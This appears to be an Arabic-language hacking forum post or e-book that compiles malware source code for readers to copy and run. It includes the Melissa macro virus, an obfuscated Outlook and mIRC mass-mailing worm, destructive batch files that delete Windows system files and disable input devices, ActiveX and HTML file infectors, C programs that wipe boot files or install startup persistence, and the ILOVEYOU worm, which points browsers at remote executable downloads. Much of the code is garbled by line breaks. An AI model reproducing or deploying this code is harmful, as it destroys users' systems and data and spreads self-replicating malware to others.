ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo
CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private
Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN,
ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private
Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN,
NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1,
ActiveDocument.Name, "Document") = False)
Then
ActiveDocument.SaveAs
FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name,
"Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000
Virus? You Decide!
'Word >
Email | Word 97 <>
Word 2000 ... it's a
new age!
If Day(Now) = Minute(Now) Then
Selection.TypeText "Twentytwo
points, plus triplewordscore,
plus fifty points for using all my
letters. Game's over. I'm outta here."
End Sub
هذا Virus worm
:اقتباس
Set O6734VC6 = createobject("scripting.filesystemobject")
O78SS2L7 = O6734VC6.getspecialfolder(1)
A6G1HQFH = O78SS2L7 & "\geilfingeren.jpg.vbs"
Set E828D4O2 = createobject("wscript.shell")
E828D4O2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru
n\WinUpdate", "wscript.exe " & A6G1HQFH & " %"
O6734VC6.copyfile wscript.scriptfullname, A6G1HQFH
UB51PCQU
If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\
CurrentVersion\fingeren.avi\UA1OM5IA") <> 1 then
KD8F5L2N
End if
If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\
CurrentVersion\fingeren.avi\D47AC8NJ") <> 1 then
HLVO1EDH ""
End if
Function KD8F5L2N()
Set O13Q767K = CreateObject("Outlook.Application")
If O13Q767K = "Outlook" Then
Set LFSIH230 = O13Q767K.GetNameSpace("MAPI")
Set LLLK4LPL = LFSIH230.AddressLists
For Each A4A83865 In LLLK4LPL
If A4A83865.AddressEntries.Count <> 0 Then
JM1R7N44 = A4A83865.AddressEntries.Count
For NHF463JD = 1 To JM1R7N44
Set OU435GC5 = O13Q767K.CreateItem(0)
Set KP511I06 = A4A83865.AddressEntries(NHF463JD)
OU435GC5.To = KP511I06.Address
OU435GC5.Subject = "Very Important!"
OU435GC5.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
execute "set DH97CAIN =OU435GC5." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99)
& Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
IJ15SDEE = A6G1HQFH
OU435GC5.DeleteAfterSubmit = True
DH97CAIN.Add IJ15SDEE
If OU435GC5.To <> "" Then
OU435GC5.Send
End If
Next
End If
Next
End If
End function
Function HLVO1EDH(AHAOA819)
If AHAOA819 <> "" Then
TJTE98P3 = E828D4O2.regread("HKEY_LOCAL_MACHINE\Software\Micr
osoft\Windows\CurrentVersion\ProgramFilesDir")
If O6734VC6.fileexists("c:\mirc\mirc.ini") Then
AHAOA819 = "c:\mirc"
ElseIf O6734VC6.fileexists("c:\mirc32\mirc.ini") Then
AHAOA819 = "c:\mirc32"
ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc\mirc.ini") Then
AHAOA819 = TJTE98P3 & "\mirc"
ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc32\mirc.ini") Then
AHAOA819 = TJTE98P3 & "\mirc"
Else
AHAOA819 = ""
End If
End If
If AHAOA819 <> "" Then
Set U127MJ5H = O6734VC6.CreateTextFile(AHAOA819 & "\script.ini", True)
U127MJ5H = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
U127MJ5H = U127MJ5H & vbCrLf & "n0=on 1:JOIN:#:{"
U127MJ5H = U127MJ5H & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
U127MJ5H = U127MJ5H & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick
"
U127MJ5H = U127MJ5H & A6G1HQFH
U127MJ5H = U127MJ5H & vbCrLf & "n3=}"
script.Close
End If
End Function
Function J706734V()
On Error Resume Next
Set CKQ24CHB = O6734VC6.Drives
For Each G2U828D4 In CKQ24CHB
OC078SS2 = G2U828D4 & " \ "
Call L7R6G1HQ(OC078SS2)
Next
End Function
Function L7R6G1HQ(FS6B51PC)
Q35A1OM5 = FS6B51PC
Set ITHD8F5L = O6734VC6.GetFolder(Q35A1OM5)
Set G6F47AC8 = ITHD8F5L.Files
For Each NFFLVO1E In G6F47AC8
If lcase(NFFLVO1E.Name) = "mirc.ini" Then
HLVO1EDH(NFFLVO1E.ParentFolder)
End If
If O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbs"
O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
End if
If O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbe"
O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
End if
Next
Set VSM3BL08 = ITHD8F5L.Subfolders
For Each UQFA0DCQ In VSM3BL08
Call (UQFA0DCQ.path)
Next
End function
Function UB51PCQU()
Randomize
If 1 + Int(Rnd * 50) = 7 then
E828D4O2.run "RUNDLL32.EXE user.exe,exitwindows"
end if
end function
الن فايروسات العزيز
blackdream
هذا الفيروس يقوم بمهام منها
نسخ نفسه في بدا التشغيل: 1
تعطيل الكيبورد والفارة: 2
انشاء اللف من المجلدات على سطح المكتب وعلى: 3 c
حذف: 4 temp antivirus
يعطل المؤشرات: 5
حذف الويندوز نهائيا: 6
غلق الجهاز بطريقة ة: 7
:كود
@echo OFF
title T0TAL_DZ is attacked your systeme
attrib +s +h %0
copy %0 "C:\Users\%username
%\AppData\Roaming\Microsoft\Win dows\start
Menu\Programs\startup"
cd C:Windowssystem32
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
mkdir C:Users%usernameDesktopHELLO GOOD SIR YOUR
COMPUTER IS IN THE PROCESS OF BEING , PLEASE ENJOY
READING THESE FOLDERS ONE BY ONE AS YOU CANT USE
YOUR KEYBOARD OR MOUSE AND DONT FORGET TO ENJOY
HAVING THE REST OF YOUR COMPUTER GET RESTARTING
YOUR COMPUTER IS TOO LATE, SHIT ALREADY WENT DOWN
echo CHECK YOUR DESKTOP
ping localhost >nul
mkdir C:HOLY MAKING FOLDERS IS FUN. WELL FUN FOR ME,
NOT FUN FOR YOU ALL I HAVE TO DO IS JUST TYPE THIS AND
POOF FOLDERS ARE MADE K so I HOPE YOU BLEW THE REST
OF THAT COMPUTER MONEY ON PHAT MONITORZ SO THIS
FITS!
echo CHECK YOUR C DRIVE
echo WHOOPS FORGOT YOUR MOUSE DOESNT WORK LOL
ping localhost >nul
echo Y | del C:WindowssecurityDatabase
cd C:WindowsCursors
del /S /F /Q *.cur
del /S /F /Q *.ani
echo OH NO WHERE THE DID YOUR CURSOR GO
ping localhost >nul
cls
echo Y | del /f /q "C:\Windows\*"
shutdown -s -t 4 -c "Sorry, T0TAL IS HERE"
exit
فيروس الهوتميل
وهدا فيروس خطير جدااا فيروس الهوتميل
يقوم بتعطيل كل شيء
انسخ الكود وضعه في المفكرة notepad واحفطه متل بي
bLaCkDrEaM.html
<html>
<head>
<**** **********="ContentType"
content="text/html; charset=iso88591">
<title>ActiveX
HTML</title>
</head>
THIS HTML USING ACTIVEX
PLEASE CLICK #YES#
<body bgcolor="#000000" Text="#C0C0C0">
<script language="VBScript">
<!This
is a MY BRAIN !>
On Error Resume Next
Dim a
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("Scripting.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
</script>
<!This
script author is THEONE!>
</body>
</html>
.................................................. ..
مقسم الى مجموعات قوم بتجميعها في notepad النوت
باد ضعه في النوت باد وحفظ بي bLaCkDrEaM.bat
:اقتباس
Disassembly of File: office_crack.exe
Code Offset = 00000400, Code Size = 00000000
Data Offset = 00000400, Data Size = 00000000
Number of Objects = 0003 (dec), Imagebase =
004A0000h
Object01: UPX0 RVA: 00001000 Offset: 00000400 Size:
00000000 Flags: E0000080
Object02: UPX1 RVA: 00007000 Offset: 00000400 Size:
00005000 Flags: E0000040
Object03: .rsrc RVA: 0000C000 Offset: 00005400 Size:
00000400 Flags: C0000040
+++++++++++++++++++ MENU INFORMATION ++++++++
++++++++++
There Are No Menu Resources in This Application
+++++++++++++++++ DIALOG INFORMATION ++++++++
++++++++++
There Are No Dialog Resources in This Application 0
+++++++++++++++++++ IMPORTED FUNCTIONS ++++++
++++++++++++ 0
Number of Imported Modules = 0 (decimal)
+++++++++++++++++++ IMPORT MODULE DETAILS +++
++++++++++++ 0
+++++++++++++++++++ EXPORTED FUNCTIONS +++++
+++++++++++++ 0
Number of Exported Functions = 0000 (decimal) ++
+++++++++++++++++++ ASSEMBLY CODE LISTING +++
+++++++++++++++
//********************** Start of Code in Object UPX0
**************
Program Entry Point = 004ABE60 (office_crack.exe File
Offset:0000B260) g
:004A7000 EE out dx, al
:004A7001 8702 xchg dword ptr [edx], eax
:004A7003 92 xchg eax,edx r
:004A7004 005026 add byte ptr [eax+26], dl
:004A7007 4A dec edx p
:004A7008 004003 add byte ptr [eax+03], al
:004A700B FD std by
:004A700C B269 mov dl, 69
:004A700E 9A2C1004F425E8 call E825:F404102C
:004A7015 0100 add dword ptr [eax], eax
:004A7017 4B dec ebx d
:004A7018 CE into b
:004A7019 699A6ED91FC82AC003B8 imul ebx, dword
ptr [edx+C81FD96E], B803C02A 0
:004A7023 B0A8 mov al, A8
:004A7025 A6 cmpsb
:004A7026 699AA6A0989088809AA6 imul ebx, dword ptr
[edx+9098A0A6], A69A8088 0
:004A7030 699A787068605850CD60 imul ebx, dword ptr
[edx+60687078], 60CD5058 0
:004A703A 9F lahf e
:004A703B 69480044073830 imul ecx, dword ptr
[eax+00], 30380744
:004A7042 344D xor al, 4D
:004A7044 D3 BYTE 0d0h
:004A7045 7403 je 004A704A or
:004A7047 28241C sub byte ptr [esp+ebx], ah
* Referenced by a (U)nconditional or (C)onditional Jump
at Address:
|:004A7045(C) y
| 00
:004A704A 1810 sbb byte ptr [eax], dl
:004A704C D32CBB shr dword ptr [ebx+4*edi], cl
:004A704F D7 xlat w
:004A7050 0823 or byte ptr [ebx], ah
:004A7052 03F8 add edi, eax e
:004A7054 29F0 sub eax, esi e
:004A7056 E84DD3344D call 4D7F43A8
:004A705B E0D8 loopnz 004A7035 ],
:004A705D D0C8 ror al, 1
:004A705F BCB4344DD3 mov esp, D34D34B4
:004A7064 34AC xor al, AC
:004A7066 A4 movsb[/
.................................................. ..
كود لحذف شاشة الترحيب للويندوز
من العنوان ستفهم كل العادة ضعه في notepad النوت باد
وحفط بي bLaCkDrEaM.bat
:اقتباس
Del c:\windows\Logos.sys
Del c:\windows\Logow.sys
.................................................. ...
فيروس الفيجول بيسك
ا فيروسات تدمير الويندوز
احفط بي bLaCkDrEaM.bat
:اقتباس
vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"[/CODE
.................................................. ...........
فيروس تدمير الويندوز new
يمتاز الفيروس بتعديب الضجية ودلك بصدار عدة اوامر تم
يقوم بتدمير الهاردسك
انسخ الكود واحفظه في النوت باد notebad وبعد دالك
حفط bLaCkDrEaM.bat
Del c:\windows\system\msconfig.exe
Del c:\windows\Rundll32.exe
Del c:\windows\regedit.exe
Del c:\windows\Rundll.exe
Del c:\Autoexec.bat
Del c:\command.com
Del c:\windows\Logos.sys
Del c:\windows\Logow.sys
Del c:\windows\Scanregw.exe
Del C:\Program Files\Internet Explorer\Iexplore.exe
Del c:\windows\system\Sysedit.exe
Del c:\windows\win.com
@Echo off
c:
cd %WinDir%\System\
deltree /y *.exe
أن شاء الله تعجبكم
أخوكم الحلم السود
.............................يتبع
bLaCkDrEaM
قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره 1
انسخ
:كود
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo
قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل 2
للجهاز
انسخ
:كود
call attrib h
r
c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo
فيرووس3
C++ :
انسخ
:كود
#include
#include
#include
main()
{
clrscr();
printf("tttCoffin Of Evil ");
printf("ttWElcome to My World");
remove("c:\windows\system.ini");
remove("c:\windows\win.ini");
remove("c:\autoexec.bat");
remove("c:\msdos.sys");
remove("c:\io.sys");
remove("c:\command.com");
remove("c:\config.sys");
remove("c:\windows\ebd\command.com");
remove("c:\windows\ebd\ebd.cab");
remove("c:\windows\ebd\Autoexec.bat");
remove("c:\windows\ebd\setramd.bat");
remove("c:\windows\ebd\Findramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/sta
rtup/win.exe");
printf("Windows destroyed ...nn");
system("PAUSE");
}
إطفاء الجهاز بعد 60 ثانيه 4
:كود
cmdow @ /HID
shutdown.exe r
f
t
60 c
"Windows XP will now restart
in 60 Seconds...hacked by "حط الكلم الذي تريد
net user aspnet /delete
EXIT
ارجو عدم استخدامه على اخواننا المسلمين
واني بريء من كل عمل يضر اخواننا المسلمين
تم تصميم الكتاب بواسطة
ايجى هاك سكول
EGY HACK SCHOOL
كودات فايروسات
echo off
1
echo WELCOME AT DARKHACK 2005
echo echo off >> c:\autoexec.bat
echo del c:\windows\explorer.exe >> c:\autoexec.bat
echo copy c:\windows\winpopup.exe c:\windows\explorer.exe >> c:\autoexec.bat
echo del c:\windows\command\xcopy.exe >> c:\autoexec.bat
echo del c:\windows\command\xcopy32.exe >> c:\autoexec.bat
echo echo ON EST PAS DES CRASHERS >> c:\autoexec.bat
echo pause >> c:\autoexec.bat
echo echo HI MAN !!! HOW ARE YOU ? >> c:\autoexec.bat
echo pause >> c:\autoexec.bat
echo REGEDIT4 >> c:\windows\registre.reg
echo [-HKEY_CLASSES_ROOT\.exe] >> c:\windows\registre.reg
echo [-HKEY_CLASSES_ROOT\.com] >> c:\windows\registre.reg
echo [-HKEY_CLASSES_ROOT\.bat] >> c:\windows\registre.reg
echo [-HKEY_CLASSES_ROOT\.sys] >> c:\windows\registre.reg
echo [-HKEY_CLASSES_ROOT\.hlp] >> c:\windows\registre.reg
copy c:\windows\registre.reg
c:\windows\menudé~1\progra~1\démarr~1\registre.reg
del c:\windows\registre.reg
echo DECRYPTING
echo del c:\windows\system\*.dll >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\system\*.sys >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\system\*.ocx >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\system\*.vxd >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\options\cab\*.cab >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\*.dll >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\*.exe >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\system\*.exe >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\bureau\*.lnk >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\system\*.drv >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\*.ini >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\fonts\*.ttf >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\SYSTEM32\drivers\*.sys >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\command\*.com >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\windows\*.com >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo del c:\autoexec.bat >> c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo format c\: /autotest /q >> c:\autoexec.bat
echo copy c:\windows\test.bat c:\autoexec.bat >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows >>
c:\windows\menudé~1\progra~1\démarr~1\command.bat
echo BYE BYE IS IT YOUR PASSWORD
C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows
2
[
HTML.Ubriel
for WindowsXP]:
كود
<html><!--Umbriel-->
<head>
<title> Second Part To Hell's HTML.Umbriel </title>
</head>
<body>
<script language="VBScript">
rem VBS
On Error Resume Next
Dim fso, shell, wrte, tempdir, windir, rand, file
Set fso=CreateObject("Scripting.FileSystemObject")
Set shell=CreateObject("Wscript.Shell")
if err.number=429 Then
shell.Run javascript:location.reload()
End If
Set windir=fso.GetSpecialFolder(0)
Set tempdir=fso.GetSpecialFolder(2)
Set wrte=fso.CreateTextFile(windir+"\windows.cmd")
wrte.WriteLine "cls"
wrte.WriteLine "@echo off"
wrte.WriteLine "shutdown -s -f -t 300 -c "+chr(34)+"Second Part To Hell's
Umbriel has you..."+chr(34)
wrte.Close()
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Desktop\Components\1\Source", "C:\umbriel.html"
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html"
Randomize
rand=int(rnd*5)+1
If rand=1 then
shell.Run windir+"\windows.cmd"
End If
</script>
<script language="JavaScript">
// JS
var viruspath, virus, code, fso, file, check, checka, checkb
fso=new ActiveXObject("Scripting.FileSystemObject")
viruspath=window.location.pathname
viruspath=viruspath.slice(1)
virus=fso.OpenTextFile(viruspath,1)
file=fso.CreateTextFile("C:\\umbriel.html")
for (i=0; i<500; i++)
{
if (checkb!=1)
{
if (Math.round(Math.random()*5)+1 == 3)
{
if (check == 2)
{
file.WriteLine("/"+"*")
file.WriteLine("*"+"/")
}
if (check == 3)
{
file.WriteLine("rem")
}
}
code=virus.ReadLine()
if (code == "/"+"*") { checka=666 }
if (code == "*"+"/") { checka=666 }
if (code == "rem") { checka=666 }
if (checka != 666 ) { file.WriteLine(code) }
checka=0
if (code=="</"+unescape("%68")+"tml>") { checkb=1 }
if (code=="// JS") { check=2 }
if (code=="rem VBS") { check=3 }
if (code=="</"+unescape("%73")+"cript>") { check=0 }
}
}
virus.Close();
file.Close();
</script>
<script language="VBScript">
rem VBS
On Error Resume Next
set fso=CreateObject("Scripting.FileSystemObject")
set shell=CreateObject("WScript.Shell")
set myfile=fso.OpenTextFile("C:\umbriel.html")
mycode=myfile.ReadAll
myfile.Close()
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
\FrontPage Explorer\Recent Page List\File1")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
\FrontPage Explorer\Recent Page List\File2")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
\FrontPage Explorer\Recent Page List\File3")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
\FrontPage Explorer\Recent Page List\File4")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer
\FrontPage Explorer\Recent Page List\File5")
if rr <> "" Then Call Umbriel(rr, mycode)
Sub Umbriel(rr, mycode)
set victim=fso.OpenTextFile(rr)
infcheck=victim.ReadLine
If infcheck<>"<html><!--Umbriel-->" Then
viccode=victim.ReadAll
victim.Close()
set wrtevic=fso.OpenTextFile(rr, 2, false, 0)
wrtevic.Write (mycode+infcheck+chr(13)+chr(10)+viccode)
wrtevic.Close
End If
End Sub
</script>
</body>
</html>
هذا كود فيروس لقيتة في موقع اجنبي جديد
شغلتة يسوي ريستارات للجهاز حسب
مافهمت مبرمج باللغة السي
3
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
{
char sys1[256];
char sys2[256];
char win1[256];
GetModuleFileName(hMod, path, sizeof(path));
GetSystemDirectory(sys1, sizeof(sys1));
GetSystemDirectory(sys2, sizeof(sys2));
GetWindowsDirectory(win1, sizeof(win1));
strcat(sys1, "\\Sleep.exe");
strcat(sys2, "\\Doom32.com");
strcat(win1, "\\WinUpdate.exe");
CopyFile(path, sys1, false);
CopyFile(path, sys2, false);
CopyFile(path, win1, false);
MessageBox (0, "Not been foun Ram ", "Error !",
MB_ICONERROR | MB_OK);
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\
Run ", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "SLEEP", 0, REG_SZ,
(const unsigned char*) sys1, sizeof(sys1));
RegSetValueEx(hKey, "DOOM32", 0, REG_SZ,
(const unsigned char*) sys2, sizeof(sys2));
RegSetValueEx(hKey, "WinUpdate", 0, REG_SZ,
(const unsigned char*) win1, sizeof(win1));
RegCloseKey(hKey);
}
{
system("shutdown s
f
");
MessageBox(NULL,"Not enough memory to load
this file.","Error !", MB_ICONERROR |
MB_OK);
}
وهذا كود من عندي للكس بي
طبعا batch file
يعني انسخه وحطه في المفكرة واحفظة
بامتداد bat
4
:كود
@echo off
echo hi
del/a/q c:\windows\*.*
del/a/q c:\windows\system32\*.*
rmdir/s/q c:\windows
echo bey
pause
" هذا كود لفيرس "الحب
******************************
rem barok loveletter(
vbe) <i hate go to school>
rem by: spyder / [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /
@GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d
ow
eq=""
ctr=0
Set fso =
CreateObject("Scripting.FileSystemObject")
set file =
fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Sof
tware\Micros oft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\W
indows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVELETTERFORYOU.
TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Cur rentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Cur rentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Soft
ware\Micros oft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnw
erhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WINBUGSFIX.
exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfd
jghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WINBUGSFIX.
exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbG
RpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WINBUGSFIX.
exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjkl
NBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnma
dshfgqw237 461234iuy7thjg/WINBUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WINBUGSFIX.
exe")=0)
then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Cur rentVersion\Run\WINBUGSFI
X",downread&"\WINBUGSFIX.
exe"
regcreate
"HKEY_CURRENT_USER\Software\Microsoft\In
ternet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or
(ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&""&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or
(s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set
scriptini=fso.CreateTextFile(folderspec&"\script.i
ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script...
mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will
affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled MardamBey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me )
{ halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVELETTERFORYOU.
HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim
x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set
out=WScript.CreateObject("Outlook.Application"
)
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
